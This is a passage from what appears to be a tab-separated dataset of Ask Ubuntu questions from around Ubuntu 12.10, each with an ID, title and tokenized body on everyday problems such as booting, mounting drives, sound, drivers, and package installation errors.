204159	add path to path environment variable for www-data	i 'm trying to add /usr/local/texlive/2012/bin/x86_64-linux to the path environment for my apache user ( www-data ) after installing tex live 2012 manually . i edited my /etc/environment export path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/texlive/2012/bin/x86_64-linux '' to include this path within my system-wide path environment variable for all users . however , if i execute sudo -u www-data printenv path i 'm only getting : # sudo -u www-data printenv path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin i ca n't understand the source of this issue and appreciate any help .
204160	hard disk messed up after installing virtual box machine	i downloaded mac osx virtual disk image for virtualbox and i made a new machine and atached the new virtual hard disk . the problem is that the mac osx virtual hard disk had 150gb and my whole hard disk memory is 160gb . after reboot i get the error unknown filesystem . when i try to acces my partitions i get the error unknown filesystem and i do n't find my ubuntu files and folders . what to do ? any chance to get back my files ? update i tryed this command without succes : sudo mount -t ext4 -o errors=continue /dev/sda2 /mnt here is the output of fdisk -l here is the output of blkid
204165	booting trouble after upgrade to 12.10 on a dell xps 15z	before the upgrade , booting did not work out of the box , but this site told me to put `` acpi=noirq '' before `` quiet splash '' in the commands befre startup , and edit /etc/default/grub too . this worked perfectly in 12.04 , but when i upgraded to 12.10 , things went wrong . the commands are as they were before ( `` acpi=noirq '' ) , but the default booting option does n't work . i have to choose advanced options and then the old kernel . bumblebee and everything else works fine , but it is n't secure to rely on an older kernel version , and it 's very annoying that i ca n't just start my computer and wait som seconds . can someone help me , please ? ( i 'll try to write `` acpi=off '' instead , but i do n't know if it works . ) in addition : yesterday i found that before `` acpi=noirq quiet splash '' there is this text : `` ro '' . when i removed that , everything worked perfectly and i were able to boot normally . today i did it again , but it did n't work . i also noticed that `` acpi=noirq quiet splash '' is repeated , and there is a meaningless mix of numbers and letters at the end of two lines and before `` root= ( something like uuid ) = '' .
204166	how do i mount a hibernated ntfs partition ?	i have a windows hdd attached to an external docking bay on my ubuntu system , but the hdd brings up an error message : error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda5 /media/92441ec8441eaf4b i am at a loss for exactly how to remove the hiberfile , or even mount it as read-only or read-write . i tried directly copy and pasting that exact command into my terminal , but it said : mount : only root can do that i do not know what to do at this point . i do need to get the information off of this drive , but i do not have a computer to put it in . does anyone know what i should do from here ?
204168	ubuntu hardware somehow related to windows	i just upgraded to ubuntu 12.10 and i noticed a very strange behavior . i restarted my windows and rebooted into ubuntu . my sound was not working in ubuntu , and i restarted again back to ubuntu . no luck . i then restarted to windows and restarted back to ubuntu and my sound was working . i remember having the same issue with my wireless card back in ubuntu 9.04 . any takes on this behavior so i can sleep better ?
204171	ca n't resize some icons	i upgraded to 12.10 yesterday and i am having a problem . icons of my files are shown as the icon image 's original size . i tried to resize the icons but it did not work ! but the normal size icons seems to be alright . tasks icon is shrunk by me ( i can do this ) . archive icon is of original size . deliverables icon is enlarged ( i can do this too ) . eclipse icon is the problem . the image used for this one is 256x256 . the icon is shown as that size . i can not resize it to be smaller ( or larger ) . i am not sure if its important , i used upgrade option from a bootable usb to install 12.10 .
204174	hotmail , imap and thunderbird	is there a way to sync to my hotmail account via imap on thunderbird ? because i am having trouble connecting via imap . but if i switch to pop3 everything works fine . am i doing something wrong in the configuration ? update : after a year finally there is imap support ! here are the settings : incoming imap server : imap-mail.outlook.com server port : 993 encryption : ssl outgoing smtp server : smtp-mail.outlook.com server port : 587 encryption : starttls the settings above work also for hotmail and not only outlook !
204177	git does not ask for passphrase during pull/push in terminal	i 'm trying to use git from the terminal in my ubuntu 12.04 desktop . my repository is hosted in github , and i have the a key for my desktop . whenever i do either `` git pull '' or `` git push , '' a dialog box will pop up asking for my passphrase . this works fine if i type the passphrase correctly . however , if i 'm connected to my desktop through ssh and do a git pull or push , the command does not prompt the passphrase and it outputs the following error : permission denied ( publickey ) . fatal : the remote end hung up unexpectedly this error makes sense because i 'm not inputting my passphrase . so the question is , how can i get the passphrase prompted in the terminal ? thanks !
204180	how to make nike+ connect software work in ubuntu . ( nike gps watch )	i am owner of nike+ gps watch and unfortunately , software ( nike+ connect ) for uploading my running data to nike+ webpage is made just for mac and windows , i tried to install it on wine but it seems as the software canâ´t detect my watch which in the usb port . can somebody help me with this problem please ?
204181	trying to do a batch rename , ca n't figure out the proper regex	i 'm trying to rename my movie collection . all of the files are currently named using dots instead of spaces , i.e . men.in.black.avi . i want to replace all of the dots with spaces which is n't terribly difficult , but i need to preserve the last dot for the file extension , i.e . .avi , .mp4 , .ogg , etc . my googling has provided no solutions . i 'm also a javascript developer and could see some snazzy applications for it . so , any suggestions ?
204187	how to disable uefi variables	i need to disable uefi variables when booting from live usb . how do i do this ? i think that this is done through setting noefi , so if this is the right approach , how do i do this ? i 've tried from grub-edit like when temporarily setting nomodeset , but it did n't change anything .
204198	mod_rewrite not working after upgrade to 12.10	i 'm hoping this is a quick and simple fix and that i just need a fresh set of eyes . however , i 'm fearful that it might actually be an error in the latest build of the rewrite module . i have a .htaccess file that turns on the rewrite engine ( i 've made sure the module is enabled ) , creates some rewrite conditions , and finally a rewrite rule . here 's my .htaccess file for reference : < ifmodule mod_rewrite.c > rewriteengine on rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule ^ ( . * ) $ index.php ? request= $ 1 [ l , qsa , nc ] < /ifmodule > now for the problem : if i go to hostname.com it works fine . if i go to hostname.com/index it works fine . however , if i go to hostname.com/index it does n't rewrite the request and i get a 404 . i 'm not sure what 's going on here . i 've used a rewrite rule tester and there does n't appear to be any issues with my rewrite rule itself . again , this issue did n't manifest until after i upgraded to 12.10 , at which point i know that apache was updated . any thoughts ? has anyone else here experienced this ? i know that two other people besides myself have experienced this here . thanks in advance for any help you can provide !
204199	old magazine lxf in software center	i think it is an excellent idea to buy the magazine linux format magazine through the software center . but now is the 164 edition available in the store but i can just find 163 in usc . should i have to upload a new sofware center to find new magazines ? ? i use 12.10
204200	`` importerror : no module named xkit.xutils '' while removing nvidia-current	i got the following problem : my pc shutdown while upgrading from 12.04 to 12.10 . everything seems to work but i ca n't install the missing updates . it always tells me to run apt-get install -f , but when i do so it just says : ( it 's in german , hope it does n't matter ) paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig abhängigkeiten werden korrigiert ... fertig die folgenden pakete wurden automatisch installiert und werden nicht mehr benötigt : espeak gcc-4.6-base : i386 gir1.2-notify-0.7 libcamel-1.2-29 libebook-1.2-12 libedataserver-1.2-15 libgconf2-4 libgnome-bluetooth8 libgnome-menu2 libgnomekbd7 libgomp1 : i386 libgweather-3-0 libimobiledevice2 libindicate5 libkpathsea5 libpoppler19 libusbmuxd1 python-gmenu verwenden sie »apt-get autoremove« , um sie zu entfernen . die folgenden zusätzlichen pakete werden installiert : nvidia-current-updates xserver-xorg-core xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-mga xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-savage xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-vesa xserver-xorg-video-vmware vorgeschlagene pakete : xfonts-100dpi xfonts-75dpi gpointing-device-settings touchfreeze firmware-linux die folgenden pakete werden entfernt : nvidia-current die folgenden pakete werden aktualisiert ( upgrade ) : nvidia-current-updates xserver-xorg-core xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-mga xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-savage xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-vesa xserver-xorg-video-vmware 20 aktualisiert , 0 neu installiert , 1 zu entfernen und 133 nicht aktualisiert . 8 nicht vollständig installiert oder entfernt . es müssen noch 0 b von 70,6 mb an archiven heruntergeladen werden . nach dieser operation werden 184 mb plattenplatz freigegeben . möchten sie fortfahren [ j/n ] ? j ( lese datenbank ... 242727 dateien und verzeichnisse sind derzeit installiert . ) entfernen von nvidia-current ... removing all dkms modules error ! there are no instances of module : nvidia-current 295.40 located in the dkms tree . done . traceback ( most recent call last ) : file `` /usr/bin/quirks-handler '' , line 26 , in < module > import quirks.quirkapplier file `` /usr/lib/python2.7/dist-packages/quirks/quirkapplier.py '' , line 26 , in < module > import xkit.xutils importerror : no module named xkit.xutils dpkg : fehler beim bearbeiten von nvidia-current ( -- remove ) : unterprozess installiertes pre-removal-skript gab den fehlerwert 1 zurück trigger für bamfdaemon werden verarbeitet ... rebuilding /usr/share/applications/bamf.index ... trigger für libc-bin werden verarbeitet ... ldconfig deferred processing now taking place fehler traten auf beim bearbeiten von : nvidia-current e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i try to remove nvidia-current it tells me to run apt-get install -f. do you guys have any idea ? i do n't want to reinstall my whole system , takes a lot of time to encrypt everything again and so on .
204203	install using a logitech keyboard and mouse with bluetooth dongle ?	i 'm trying to install 12.10 on my system , but my mouse and keyboard are not working during installation . i use the logitech mx5500 bluetooth mouse+keyboard combo with a bluetooth dongle . my keyboard and mouse work in my uefi bios , and during the windows 7/8 installation . my keyboard also works in the ubuntu screen that allows me to set options , install , use the live cd , etc , before boot . i 'm wondering if anyone knows a way to get this dongle working during the installation process so that i can actually install 12.10 .
204206	configure unity lenses and what they search	i 'm using ubuntu 12.10 . i 've read about a lense ( ppa : pydave/unity-lenses ) that you can replace with the original files and folders lense , so you can search all your files . instead of the current which only search used/recently used files and programs . i could n't get this to work with 12.10 , got a bunch of errors when i tried adding the ppa . i would like to set up a lens that can search all my files and folders ( from all of my 3 hdd 's ) , one that search through my videos ( ability to specify which folders ) and the same for music . so basically i would like to set up three specific lenses that each get a set of specified folders that they search through . if this is not possible , is there atleast a way to configure the current files and folders lense to ignore certain folders ? i do n't like when my dash shows files that i do n't want to be shown . i should add that i 'm completely new to ubuntu and i apologize beforehand if this information could easily be found . but i was n't able to find something like this . edit : i found out how i can use the privacy application to ignore what i want , so that 's sorted now . sorry for not researching it more . but my question regarding the lenses still stand . all help is greatly appreciated .
204207	easiest way to test battery life ?	i 'd like to test the battery life of my ubuntu 12.10 on my think pad t520 . are there any scripts or tools to log to a file ? i 'm seeing about 3 hours of use .
204209	does your nvidia gtx 660 work with the ubuntu-provided nvidia drivers ?	( reference needed ) i 'm planning on buying a gtx 660 , but i had bad experiences with the 560 se . so , if you have a 660 and it works well/bad with the ubuntu-provided nvidia driver , please just give a short judgment ( good/bad basically ) . can you get the 32bit opengl to work ? i want to run pol . thanks .
204210	how to permanently fix black screen after boot in 12-04 having intel graphic card	i have installed ubuntu 12.04 in dual mode with windows 7 . the screen goes black after the initial boot . i have tried editing grub in the initial boot by typing i915.modeset=0 and it works , but how can i do it permanently ? i am using hp g62 laptop with intel hd graphics .
204211	how to disable the guest account via the gui ?	i know you can edit a configuration file to disable the guest account , but is there any option to do that via the ubuntu 12.10 's gui ? it 's hard for me to believe that a simple on/off option was n't implemented since the guest account was added to ubuntu , and i 'd be glad to find that option added as a feature to the 12.10 release .
204213	ubuntu 12.04 boot stuck at splash screen	i tried to change lightdm with gdm but when i set the computer to use gdm and logged out lightdm was used , so i uninstalled gdm , now this is the problem : i shut down my computer and went to sleep , at the other day , i turned my pc on and it got stuck at splash screen . i tried to start from recovery mode but did not work also i see this error : sbd asking for cache data failed and keeps going and going to no end ( i left the computer at this for about 30 minutes and it did not start ) i tried reinstalling gdm from recovery mode and setting lightdm before uninstalling but nothing seems to work . i have been forced to use windows again and is very under-productive .
204217	maas on ubuntu 12.10	i just upgraded a ubuntu 12.04 server to 12.10 . it was built with maas but no other servers had been added to its private network yet , but i confirmed that dnsmasq was setup correctly for dhcp and iptables for forwarding , etc ... now i that i have upgraded to 12.10 , dhcp is no longer available and i found that dnsmasq was removed . what is controlling dhcp now , and where do i edit the correct configuration . this has to be done before i build the other servers and my small testing cloud .
204218	how to remove dual boot menu ?	i used to dual boot ubuntu with windows 7 . i got rid of windows and also deleted the partition where it was installed . now , in the dual boot menu windows 7 is still available , and listed as first option . how do i completely remove the menu so that ubuntu boots directly ? thanks in advance .
204229	handycafe port to linux	does any one knows a project that has capability similar to handycafe or cafesuite . i want an application that can restrict clients like how the above apps do on windows box . i have seen makhawa , but i do n't think it will fit the bill .
204230	how to share rhythmbox playlists in a network ?	my music is stored on a synology nas and rhythmbox has access via nfs to the music files ; works perfect . but how can i share the rhythmbox playlists ? i tried to store the playlists.xml file on the nas and created a link in the home/user/.local/share/rhythmbox directory to the playlists.xml on the nas but rhythmbox converts the link to a local file . any idea on how to force rhythmbox to use the link to the playlists.xml file on the nas ?
204231	how to change launcher opacity / transparency ?	how can i change the opacity of the launcher in ubuntu 12.10 ? in 12.04 i used myunity to do that but myunity is not available for ubuntu 12.10 ?
204234	could not update iceauthority file , password not working in terminal	i tried to login and got could not update iceauthority file error message . tried to fix it in terminal after pressing ctrl+alt+f1 , but it wo n't recognize my password to let me do anything .
204235	ask root permission in a program	i wanted to make a program ( with quickly ) that edits some root files . my question : how can i ask for root permission ( after a button is clicked ) to execute a command ( just like the software center does ) ? i want it to be universal . for both gnome and kde
204249	laptop buttons not working on a dell latitude e6400	i have install ubuntu 12.10 64 bit on my dell latitude e6400 laptop . i have the latest bios version for my laptop ( a32 ) which i downloaded from the official dell website by checking updates that matches the service tag on my laptop . i 'm having serious problems with all the mouse buttons on my laptop . the right-click button does n't work at all under any circumstance . the left click button only work when clicking on icons in the left side-bar and in the top menu ( like clicking on the power icon in the top-right corner or clicking on the file menu ) . however none of the buttons work in any of the applications even simple one like the file browser ( home folder ) . for example when i try to click on a folder inside nautilus it does n't work or when i try to click on the `` x '' close icon to close the window it also does n't work . can you help me figure it out ?
204250	why is there a minus sign instead of a check mark in the software sources configuration window ?	after an initial installation of ubuntu , the software sources window has check marks on main , universe , restricted , and multiverse , but a minus sign on source code . nevertheless , all deb-src lines in /etc/apt/sources.list are uncommented . what is the difference to explicitly selecting the checkbox ?
204253	lightdm backgroud is a simple purple radiant	it seems after i tried to change the login screen background with ubuntu tweak , the greeter 's background stays a simple purple background with just the spots.. i tried using dconf-editor , rechanging the image from ubuntu tweak back to the default , it still does not work . so in the end , everything for the lightdm points to /usr/share/backgrounds/warty-final-ubuntu.png . but it 's still a purple solid color . how do i fix it ?
204259	why does a clicked on application not move to the foreground ?	i 'm running into issues where if i have two applications running , where one is smaller and in the foreground , and i click on the window in the background , it does not move into the foreground . for example , if i have a terminal window on top of firefox , and i click on the webpage in the background , firefox gains focus but the terminal is still visible on top of firefox . is there a way to change this setting so that clicked on applications are always on top ? note : if i click on the title bar , the application does in fact move to the top ( in front of the terminal for instance ) .
204266	how do i set up my workspaces to have different background images ?	as the title states im trying to put in different images for each workspace ( i have all the images ready ) but every time i try to load up gconf-editor is says its not there or something ... i went into the settings and i have a dconf but no gconf ... also when i load up the dconf editor i cant find nautilus under the apps to change the desktop setting to use compizconfig to set the different workspaces . im currently running 12.10 and ive installed nautilus and compizconfig . i also tried installing the compizconfig extras but it says unable to locate compizconfig-fusion-plugins-extra . please help and thank you : d
204276	i 'm having issues setting up my workspaces to hold different backgrouns . can anyone help ?	im trying to put in different images for each workspace ( i have all the images ready ) but every time i try to load up gconf-editor is says its not there or something ... i went into the settings and i have a dconf but no gconf ... also when i load up the dconf editor i cant find nautilus under the apps to change the desktop setting to use compizconfig to set the different workspaces . im currently running 12.10 and ive installed nautilus and compizconfig . i also tried installing the compizconfig extras but it says unable to locate compizconfig-fusion-plugins-extra . please help and thank you : d edit : i finally got everything installed and working but im still not seeing the `` wallpaper '' icon on the ccsm utilities tab to be able to change the settings so that i can have multiple workspace wallpapers ... . edit : i 'm running compiz 0.9.8.4 if that helps anyone out too
204277	sound not working with ubuntu 12.10 clean install	did a clean install of ubuntu 12.10 from 12.04 and the sound is not working now . in 12.04 it worked out of the box . i ran hwinfo -- sound hal.1 : read hal dataprocess 4222 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 10 : pci 1b.0 : 0403 audio device [ created at pci.318 ] unique id : u1nb.ekgk5auw5ra sysfs id : /devices/pci0000:00/0000:00:1b.0 sysfs busid : 0000:00:1b.0 hardware class : sound model : `` intel 82801g ( ich7 family ) high definition audio controller '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x27d8 `` 82801g ( ich7 family ) high definition audio controller '' subvendor : pci 0x1028 `` dell '' subdevice : pci 0x01de revision : 0x01 memory range : 0xfdffc000-0xfdffffff ( rw , non-prefetchable ) irq : 11 ( no events ) module alias : `` pci : v00008086d000027d8sv00001028sd000001debc04sc03i00 '' driver info # 0 : driver status : snd_hda_intel is active driver activation cmd : `` modprobe snd_hda_intel '' config status : cfg=new , avail=yes , need=no , active=unknown not sure how to proceed to fix this . has also worked prior to this version . how to resolve this ?
204286	sound stops working after a while in ubuntu 12.10	i did a clean install on ubuntu 12.10 . everything seemed fine at first including sound but after a while it stopped working . to get is back i have to restart it , sometimes even more than once . any idea on how to fix this ? sudo aplay -l default playback/recording through the pulseaudio sound server sysdefault : card=pch hda intel pch , alc665 analog default audio device front : card=pch , dev=0 hda intel pch , alc665 analog front speakers surround40 : card=pch , dev=0 hda intel pch , alc665 analog 4.0 surround output to front and rear speakers surround41 : card=pch , dev=0 hda intel pch , alc665 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=pch , dev=0 hda intel pch , alc665 analog 5.0 surround output to front , center and rear speakers surround51 : card=pch , dev=0 hda intel pch , alc665 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=pch , dev=0 hda intel pch , alc665 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=pch , dev=0 hda intel pch , alc665 digital iec958 ( s/pdif ) digital audio output hdmi : card=pch , dev=0 hda intel pch , hdmi 0 hdmi audio output dmix : card=pch , dev=0 hda intel pch , alc665 analog direct sample mixing device dmix : card=pch , dev=1 hda intel pch , alc665 digital direct sample mixing device dmix : card=pch , dev=3 hda intel pch , hdmi 0 direct sample mixing device dsnoop : card=pch , dev=0 hda intel pch , alc665 analog direct sample snooping device dsnoop : card=pch , dev=1 hda intel pch , alc665 digital direct sample snooping device dsnoop : card=pch , dev=3 hda intel pch , hdmi 0 direct sample snooping device hw : card=pch , dev=0 hda intel pch , alc665 analog direct hardware device without any conversions hw : card=pch , dev=1 hda intel pch , alc665 digital direct hardware device without any conversions hw : card=pch , dev=3 hda intel pch , hdmi 0 direct hardware device without any conversions plughw : card=pch , dev=0 hda intel pch , alc665 analog hardware device with all software conversions plughw : card=pch , dev=1 hda intel pch , alc665 digital hardware device with all software conversions plughw : card=pch , dev=3 hda intel pch , hdmi 0 hardware device with all software conversions
204288	installed mouse cursor theme but it only shows in some applications	i went here and downloaded a theme named ubuntaero_v1.0 . then i extracted the files to /usr/share/icons . after rebooting the system , the default cursor theme remains , except when moving the mouse over some applications ' windows , such as keepassx . however , when i take a screenshot of that same window , the outcome shows the default cursor again . then i went to terminal : sudo update-alternatives -- config x-cursor-theme the ubuntaero theme is not listed . it seems i am missing something in installing a cursor theme . what could it be ?
204289	i cant access my files after i installed nautilus . can anybody help ?	as the title states , i installed nautilus and it keeps giving me an error saying it cant access my files folder ( or any other folder for that matter ) im currently running 12.10
204290	thunderbird new messages indicator does n't show with ubuntu 12.10	a similar topic had been closed because of a beta release . i 'm using final release and i confirm the problem . i 've tried with a brand new profile of thunderbird , nothing . i can hear the sound , but the enveloppe at the top stays white and the icon in unity does not indicate the number of new emails like before . i 'm using the 64bits version of the 12.10 release , fresh install , no upgrade . cheers
204291	how to install firefox and firefox aurora in parallel ?	i would like to install firefox aurora in parallel with the `` release '' version of firefox . i do not want to replace the release version . i managed to do this with firefox nightly but not with aurora . os : precise browser : firefox 16
204293	python ( v2.7 ) requires to install plugins to create media files of the following type : vorbis encoder	this is the message i get when i try to rip a cd from any player . i usually use the stock rhythmbox but have tried others to no avail . i have just updated to 12.10 from 12.04 and i had no problems in 12.04 . i have read the other posts and have switched to the main server in the software sources menu . i have installed ubuntu restricted extras . nothing seems to help . i would appreciate any help . `` python ( v2.7 ) requires to install plugins to create media files of the following type : vorbis encoder '' thanks !
204300	i have installed ubuntu into my windows 7 64 bit , i am having problems with boot	i have a problem i have not found any solution to , i am not so familiar with ubuntu commands or ubuntu in general . my problem started when i chose in windows 7 settings/ bootloader settings as ubuntu default , and it boots straight into grub , and in grub if i choose windows , it goes to the loader for half a sec , and goes straight back to grub . so i have disabled my windows 7 completely . and i have not found any way to boot back to windows , so i could go to settings and set it to windows ... my only option seems to be re-installing the whole windows 7 ... thus loosing all my saved games etc ... i am fine using ubuntu for basic needs , but i am getting desperate here ...
204302	how do i change the automount point ?	in ubuntu 12.10 automount point has changed from /media/xyz ( like was in 12.04 ) into /media/ '' username '' /xyz . this is a problem for me because i 've my photos into an external usb hdd and shotwell do n't find any photo when it is using a backup database . how can i set my automount point ? i do n't need to mount usb disk on startup but only in a second moment .
204303	ubuntu 12.10 boots slowly	i have upgraded ubuntu 12.04 to 12.10 but it boots slowly . my config : intel core i5 2500 , nvidia gts450 , 8gb 1333mhz ram , 1tb hdd ( 5400rpm ) , asrock h61m/u3s3 . here 's the bootchart image : http : //postimage.org/image/jr4cy70np/ i think it should boot faster and do n't know what the problem can be .
204304	alt keys ( alt and alt gr ) does n't work on ubuntu 12.10	yesterday i installed ubuntu 12.10 , i did n't want to upgrade my 12.04 , because when one upgrades the system , sometimes something fails , so the fact is i installed a ubuntu 12.10 , all was perfect , then i installed nvidia drivers , filezilla , oracle-java7-installer , gimp and vlc , these are the only programs that i have installed . now , when i try to open a terminal with ctrl + alt + t , nothing happens , when i just intalled them my alt key worked fine , but now , any shortcut that uses alt , does n't work . i opened the keyboard settings , and i see when i press any of the keys and alt , the key in the screen does n't show up , like the other keys , so it seems like i do n't have the alt key , i do n't know what happened , and i searched for solutions on the internet and tried with things such as keyboard preferences - > behavior settings - > options - > alt / super keys - > i tried all of them , and the problem persists . this is the first time this happens to me , i 've used ubuntu since 10.04 and never had any issues . any help would be greatly appreciated .
204305	how do i run libreoffice calc without text input dialog ?	i have a csv file written by a python script of mine . i want to make a shell script that opens the file in read-only mode , which i have done . # ! /bin/sh libreoffice -- view ~/documents/timeclock.csv my problem is that every time i open it , the text input dialog opens . this is an example of what the file looks like . it 's semicolon separated . how can i get libreoffice to either use pre-set settings , or command line arguments ? ; ; ; ; ; =sum ( d2 : d100 ) ; ; ; ; ; 15 ; ; ; ; ; =f1*f2 =date ( 2012,10,13 ) ; =time ( 10,21,56 ) ; =time ( 18,45,27 ) ; =abs ( indirect ( `` b '' & row ( ) ) - indirect ( `` c '' & row ( ) ) ) *24 =date ( 2012,10,21 ) ; =time ( 10,23,16 ) ; =time ( 17,17,12 ) ; =abs ( indirect ( `` b '' & row ( ) ) - indirect ( `` c '' & row ( ) ) ) *24
204306	installing eclipse-cdt installs jdt and bunch of others as well	i wanted to install eclipse-cdt for c++ development . but it looks like it cant be installed alone in ubuntu . why are there separate packages if they ca n't be installed alone ? [ balakrishnan @ mylap ~ ] $ sudo apt-get install eclipse-cdt reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : ant ant-optional aspectj binfmt-support ca-certificates-java default-jdk default-jre default-jre-headless eclipse-cdt-jni eclipse-emf eclipse-jdt *eclipse-pde* eclipse-platform eclipse-platform-data eclipse-rcp eclipse-rse fastjar icedtea-7-jre-jamvm jarwrapper java-common junit junit4 libapache-pom-java libasm3-java libaspectj-java libatk-wrapper-java libatk-wrapper-java-jni libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libcommons-beanutils-java libcommons-cli-java libcommons-codec-java libcommons-collections3-java libcommons-compress-java libcommons-dbcp-java libcommons-digester-java libcommons-httpclient-java libcommons-lang-java libcommons-logging-java libcommons-parent-java libcommons-pool-java libdb-java libdb-je-java libdb5.1-java libdb5.1-java-jni libeasymock-java libecj-java libequinox-osgi-java libfelix-bundlerepository-java libfelix-gogo-command-java libfelix-gogo-runtime-java libfelix-gogo-shell-java libfelix-osgi-obr-java libfelix-shell-java libfelix-utils-java libgconf2-4 libgeronimo-jpa-2.0-spec-java libgeronimo-jta-1.1-spec-java libgeronimo-osgi-support-java libgif4 libgnome2-0 libgnome2-bin libgnome2-common libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libhamcrest-java libice-dev libicu4j-4.4-java libicu4j-java libidl-common libidl0 libjetty8-java libjline-java libjsch-java libjtidy-java libkxml2-java liblucene2-java liborbit2 libosgi-compendium-java libosgi-core-java libosgi-foundation-ee-java libpthread-stubs0 libpthread-stubs0-dev libregexp-java libservlet2.5-java libservlet3.0-java libsm-dev libswt-cairo-gtk-3-jni libswt-glx-gtk-3-jni libswt-gnome-gtk-3-jni libswt-gtk-3-java libswt-gtk-3-jni libswt-webkit-gtk-3-jni libtomcat7-java libx11-dev libx11-doc libxau-dev libxcb1-dev libxdmcp-dev libxerces2-java libxml-commons-external-java libxml-commons-resolver1.1-java libxt-dev libxz-java openjdk-7-jdk openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib sat4j ttf-dejavu-extra tzdata-java x11proto-core-dev x11proto-input-dev x11proto-kb-dev xorg-sgml-doctools xtrans-dev suggested packages : ant-gcj ant-doc libbsf-java liboro-java libxalan2-java libjaxp1.3-java liblog4j1.2-java jython antlr libbcel-java libjdepend-java libgnumail-java libcommons-net-java javacc ant-optional-gcj eclipse equivs junit-doc libbonobo2-bin libcommons-beanutils-java-doc libcommons-collections3-java-doc libcommons-dbcp-java-doc libcommons-digester-java-doc libcommons-httpclient-java-doc libavalon-framework-java libcommons-logging-java-doc libexcalibur-logkit-java libdb5.1-java-gcj libeasymock-java-doc ecj libecj-java-gcj libfelix-bundlerepository-java-doc libfelix-gogo-command-java-doc libfelix-gogo-runtime-java-doc libfelix-gogo-shell-java-doc libfelix-osgi-obr-java-doc libfelix-shell-java-doc libfelix-utils-java-doc libgeronimo-jpa-2.0-spec-java-doc libgeronimo-jta-java-doc libgeronimo-osgi-support-java-doc desktop-base libgnomevfs2-bin libgnomevfs2-extra gamin fam gnome-mime-data libice-doc jetty8 libjetty8-java-doc libjline-java-doc libjtidy-java-doc libosgi-compendium-java-doc libosgi-core-java-doc libosgi-foundation-ee-java-doc libsm-doc libswt-gtk-3-java-gcj tomcat7 libxcb-doc libxerces2-java-doc libxerces2-java-gcj libxml-commons-resolver1.1-java-doc libxt-doc openjdk-7-demo openjdk-7-source visualvm icedtea-7-plugin sun-java6-fonts fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following new packages will be installed : ant ant-optional aspectj binfmt-support ca-certificates-java default-jdk default-jre default-jre-headless eclipse-cdt eclipse-cdt-jni eclipse-emf eclipse-jdt eclipse-pde eclipse-platform eclipse-platform-data eclipse-rcp eclipse-rse fastjar icedtea-7-jre-jamvm jarwrapper java-common junit junit4 libapache-pom-java libasm3-java libaspectj-java libatk-wrapper-java libatk-wrapper-java-jni libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libcommons-beanutils-java libcommons-cli-java libcommons-codec-java libcommons-collections3-java libcommons-compress-java libcommons-dbcp-java libcommons-digester-java libcommons-httpclient-java libcommons-lang-java libcommons-logging-java libcommons-parent-java libcommons-pool-java libdb-java libdb-je-java libdb5.1-java libdb5.1-java-jni libeasymock-java libecj-java libequinox-osgi-java libfelix-bundlerepository-java libfelix-gogo-command-java libfelix-gogo-runtime-java libfelix-gogo-shell-java libfelix-osgi-obr-java libfelix-shell-java libfelix-utils-java libgconf2-4 libgeronimo-jpa-2.0-spec-java libgeronimo-jta-1.1-spec-java libgeronimo-osgi-support-java libgif4 libgnome2-0 libgnome2-bin libgnome2-common libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libhamcrest-java libice-dev libicu4j-4.4-java libicu4j-java libidl-common libidl0 libjetty8-java libjline-java libjsch-java libjtidy-java libkxml2-java liblucene2-java liborbit2 libosgi-compendium-java libosgi-core-java libosgi-foundation-ee-java libpthread-stubs0 libpthread-stubs0-dev libregexp-java libservlet2.5-java libservlet3.0-java libsm-dev libswt-cairo-gtk-3-jni libswt-glx-gtk-3-jni libswt-gnome-gtk-3-jni libswt-gtk-3-java libswt-gtk-3-jni libswt-webkit-gtk-3-jni libtomcat7-java libx11-dev libx11-doc libxau-dev libxcb1-dev libxdmcp-dev libxerces2-java libxml-commons-external-java libxml-commons-resolver1.1-java libxt-dev libxz-java openjdk-7-jdk openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib sat4j ttf-dejavu-extra tzdata-java x11proto-core-dev x11proto-input-dev x11proto-kb-dev xorg-sgml-doctools xtrans-dev 0 upgraded , 123 newly installed , 0 to remove and 